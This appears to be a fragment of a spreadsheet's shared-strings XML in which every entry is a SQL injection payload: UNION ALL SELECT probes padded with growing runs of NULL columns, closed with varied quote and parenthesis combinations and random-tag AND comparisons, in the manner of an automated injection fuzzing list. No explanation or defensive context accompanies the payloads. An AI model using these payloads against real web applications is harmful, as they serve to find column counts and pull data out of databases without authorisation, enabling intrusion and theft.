    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'zhNS' = 'zhNS</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'DUar' = 'DUar</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'QNOd' = 'QNOd</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'oUsq' = 'oUsq</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'Bqqy' = 'Bqqy</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'RUwy' = 'RUwy</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'YpBd' = 'YpBd</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'Njqx' = 'Njqx</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'jUrl' = 'jUrl</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'hxqA' = 'hxqA</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'KxBO' = 'KxBO</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'KgXa' = 'KgXa</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'TJxD' = 'TJxD</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'Catk' = 'Catk</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'CuUr' = 'CuUr</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'dneY' = 'dneY</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'rtwG' = 'rtwG</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'HNtN' = 'HNtN</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'duBd' = 'duBd</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'vjBp' = 'vjBp</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'STpC' = 'STpC</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'Bcyy' = 'Bcyy</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'WASO' = 'WASO</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'APsq' = 'APsq</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'mqoK' = 'mqoK</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'eLSE' = 'eLSE</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'YNdj' LIKE 'YNdj</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'koWB' LIKE 'koWB</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'JMri' LIKE 'JMri</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'nBDz' LIKE 'nBDz</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'bwXy' LIKE 'bwXy</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'ZnIp' LIKE 'ZnIp</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'Fbie' LIKE 'Fbie</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'gXTr' LIKE 'gXTr</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'aESY' LIKE 'aESY</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'CVcP' LIKE 'CVcP</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'XARd' LIKE 'XARd</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'VGjH' LIKE 'VGjH</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'vJvq' LIKE 'vJvq</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'LljU' LIKE 'LljU</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'HrET' LIKE 'HrET</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'bQAQ' LIKE 'bQAQ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'fnvY' LIKE 'fnvY</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'JaMh' LIKE 'JaMh</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'vNYu' LIKE 'vNYu</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'EfrK' LIKE 'EfrK</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'pWwl' LIKE 'pWwl</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'Qyen' LIKE 'Qyen</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'xkiX' LIKE 'xkiX</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'OgOf' LIKE 'OgOf</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'XjPQ' LIKE 'XjPQ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'awzH' LIKE 'awzH</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'ELga' LIKE 'ELga</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'zRWu' LIKE 'zRWu</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'yccm' LIKE 'yccm</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'iCoy' LIKE 'iCoy</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'jDyt' LIKE 'jDyt</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'apPH' LIKE 'apPH</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'feHg' LIKE 'feHg</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'EbbI' LIKE 'EbbI</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'YsgM' LIKE 'YsgM</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'yHye' LIKE 'yHye</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'mctk' LIKE 'mctk</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'xYPJ' LIKE 'xYPJ</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'PgIb' LIKE 'PgIb</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'YnJL' LIKE 'YnJL</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "Newo" = "Newo</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "eoom" = "eoom</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "OWzg" = "OWzg</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "DhAM" = "DhAM</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "nGGN" = "nGGN</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "vdkt" = "vdkt</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "kMXD" = "kMXD</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "YyIl" = "YyIl</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "sNuN" = "sNuN</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "XbBi" = "XbBi</t>
  </si>
  <si>
